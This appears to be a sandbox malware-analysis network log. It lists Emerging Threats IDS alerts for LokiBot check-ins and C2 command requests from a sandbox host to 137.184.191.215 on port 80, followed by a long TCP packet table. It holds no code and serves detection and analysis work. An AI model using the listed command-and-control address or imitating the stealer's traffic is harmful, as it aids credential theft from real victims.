                                      2024-10-01T07:44:26.709116+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:26.709116+02002025381ET MALWARE LokiBot Checkin1192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.245863+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.245863+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549736137.184.191.21580TCP
                                      2024-10-01T07:44:29.403730+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:29.403730+02002025381ET MALWARE LokiBot Checkin1192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:31.998664+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:31.998664+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549737137.184.191.21580TCP
                                      2024-10-01T07:44:32.156332+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:32.156332+02002025381ET MALWARE LokiBot Checkin1192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.719619+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.719619+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549738137.184.191.21580TCP
                                      2024-10-01T07:44:34.894944+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:34.894944+02002025381ET MALWARE LokiBot Checkin1192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.488199+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.488199+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549739137.184.191.21580TCP
                                      2024-10-01T07:44:37.656693+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:37.656693+02002025381ET MALWARE LokiBot Checkin1192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.272417+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.272417+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549740137.184.191.21580TCP
                                      2024-10-01T07:44:40.680871+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:40.680871+02002025381ET MALWARE LokiBot Checkin1192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.361554+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.361554+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549741137.184.191.21580TCP
                                      2024-10-01T07:44:43.545598+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:43.545598+02002025381ET MALWARE LokiBot Checkin1192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.086297+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.086297+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549742137.184.191.21580TCP
                                      2024-10-01T07:44:46.240169+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:46.240169+02002025381ET MALWARE LokiBot Checkin1192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.810480+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.810480+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549743137.184.191.21580TCP
                                      2024-10-01T07:44:48.957161+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:48.957161+02002025381ET MALWARE LokiBot Checkin1192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.554232+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.554232+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549744137.184.191.21580TCP
                                      2024-10-01T07:44:51.716387+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:51.716387+02002025381ET MALWARE LokiBot Checkin1192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.256457+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.256457+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549745137.184.191.21580TCP
                                      2024-10-01T07:44:54.419846+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:54.419846+02002025381ET MALWARE LokiBot Checkin1192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.002316+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.002316+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549746137.184.191.21580TCP
                                      2024-10-01T07:44:57.163238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:57.163238+02002025381ET MALWARE LokiBot Checkin1192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.702074+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.702074+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549747137.184.191.21580TCP
                                      2024-10-01T07:44:59.847504+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:44:59.847504+02002025381ET MALWARE LokiBot Checkin1192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:45:02.415633+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549748137.184.191.21580TCP
                                      2024-10-01T07:45:02.415633+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549748137.184.191.21580TCP
                                      Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                      Oct 1, 2024 07:43:03.855581999 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.855591059 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.855628014 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.857676029 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.859961987 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.859999895 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.860013008 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.860023022 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.860054970 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.862023115 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.864048958 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.864104986 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.864114046 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.866528034 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.866564035 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.866581917 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.866592884 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.866630077 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.868244886 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.870352030 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.870387077 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.870400906 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.870409012 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.870440006 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.872395039 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.874340057 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.874391079 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.874398947 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.876377106 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.876422882 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.876430035 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.878498077 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.878532887 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.878552914 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.878561020 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.878593922 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.880439997 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.882436991 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.882491112 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.882498980 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.882508993 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.882550001 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.884522915 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.886347055 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.886405945 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.886414051 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.886425018 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.886462927 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.888678074 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.888895988 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.888938904 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.888947010 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.890294075 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.890343904 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.890352011 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.892502069 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.892553091 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.892560959 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.894162893 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.894207001 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.894213915 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.896066904 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.896116018 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.896122932 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.897908926 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.897955894 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.897963047 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.899815083 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.899899960 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.899907112 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.901586056 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.901650906 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.901657104 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.903403997 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.903472900 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.903486967 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.905247927 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.905308962 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.905316114 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.907035112 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.907099009 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.907107115 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.908819914 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.908885956 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.908894062 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.910593987 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.910657883 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.910665035 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.912328005 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.912384033 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.912390947 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.914226055 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.914289951 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.914297104 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.915719032 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.915776014 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.915782928 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.917741060 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.917798042 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.917804956 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.919991970 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.920053005 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.920063972 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.922172070 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.922223091 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.922235012 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.922952890 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.922993898 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.923010111 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.924424887 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.924474001 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.924485922 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.925884008 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.925940990 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.925954103 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.927313089 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.927370071 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.927381039 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.928823948 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.928888083 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.928904057 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.930246115 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.930274963 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.930296898 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.930310965 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.930351973 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.931545019 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.932998896 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.933032036 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.933053017 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.933064938 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.933098078 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.934310913 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.935906887 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.935951948 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.935962915 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.938126087 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.938170910 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.938172102 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.938184023 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.938215971 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.940252066 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.940427065 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.940458059 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.940476894 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.940489054 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.940545082 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.944644928 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.944786072 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.944809914 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.944829941 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.944840908 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.944852114 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.944871902 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.951284885 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.951313972 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.951343060 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.951363087 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.951371908 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.951392889 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.951396942 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.951432943 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.951447010 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957413912 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957484007 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.957492113 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957561016 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957592010 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957611084 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.957616091 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957626104 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.957654953 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.963422060 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.963459969 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.963481903 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.963483095 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.963493109 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.963521004 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.963629007 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.963675976 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.963681936 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969768047 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969804049 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969822884 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.969830990 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969863892 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969873905 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.969880104 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.969919920 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.969926119 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.975820065 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.975851059 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.975878954 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.975908041 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.975934982 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.976039886 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.976048946 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.976104975 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.979360104 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.979413033 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.979440928 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.979448080 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.979496956 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.979629040 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.979676962 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.979727030 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.979732990 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.984756947 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.984788895 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.984810114 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.984816074 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.984827042 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.984859943 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.985389948 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.985438108 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.985444069 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990405083 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990505934 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.990513086 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990546942 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990576029 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990583897 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.990590096 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.990638971 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.991600990 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995786905 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995826006 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995845079 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.995855093 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995887041 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995896101 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.995903015 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:03.995944023 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:03.995949030 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001055002 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001085043 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001110077 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001157045 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.001164913 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001197100 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.001353979 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.001414061 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.001420021 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.006882906 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.006959915 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.006959915 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.006972075 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.007018089 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.007023096 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.007033110 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.007081032 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.007554054 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.011341095 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.011368990 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.011401892 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.011423111 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.011430979 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.011455059 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.015615940 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:45.589672089 CEST4971980192.168.2.5137.184.191.215
